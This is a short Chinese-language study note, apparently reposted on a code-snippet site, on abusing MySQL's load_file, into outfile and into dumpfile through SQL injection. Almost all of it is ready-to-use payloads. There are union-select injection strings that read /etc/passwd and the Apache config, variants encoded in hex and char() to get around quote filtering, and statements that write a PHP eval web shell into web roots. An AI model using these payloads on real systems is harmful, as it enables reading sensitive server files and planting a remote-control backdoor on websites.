首页 > 代码库 > Mysql 读与写函数利用学习
Mysql 读与写函数利用学习
语句简单记忆:
select load_file();
select ‘一句话‘ into outfile ‘网站路径‘ ;
1、Mysql 读与写函数
(1) 读取函数
load_file()
(2) 写入函数
into outfile ‘‘
into dumpfile ‘‘
2、Mysql读函数使用
(1)读配置文件语句
select load_file(‘/etc/httpd/conf/httpd.conf‘)
select load_file(‘/etc/passwd‘)
(2)注入点读配置文件语句
and 1=2 union select 1,load_file(‘/etc/httpd/conf/httpd.conf‘),3,4,5,6 -- -
and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
(3)单引号绕过配置文件读取
and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
and 1=2 union select 1,load_file(0x2F6574632F706173737764),3,4,5,6 -- - 0x2F6574632F706173737764为"/etc/passwd"十六进制hex转换结果;
and 1=2 union select 1,load_file(char(47 101 116 99 47 112 97 115 115 119 100 )),3,4,5,6 -- - char(47 101 116 99 47 112 97 115 115 119 100 )为“、etc/passwd”的ASCII转码;
注:当浏览器返回数据时,有可能乱码问题,此时可以使用hex()函数将字符串转换为“十六进制” 数据,格式如下。
and 1=2 union select 1,hex(load_file(char(47 101 116 99 47 112 97 115 115 119 100))) ,3,4,5,6 -- -
3、Mysql写入函数使用
(1)写入一句话语句
select ‘一句话‘ into outfile ‘/opt/lampp/htdocs/1.php‘
select ‘一句话‘ into dumpfile ‘/var/www/html/1.php‘
(2)注入点写入一句话语句
select ‘<?php @eval($_POST[123]);?>‘ into outfile ‘/opt/lampp/htdocs/1.php‘
select ‘<?php @eval($_POST[123]);?>‘ into dumpfile ‘/var/www/html/1.php‘
Mysql 读与写函数利用学习
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。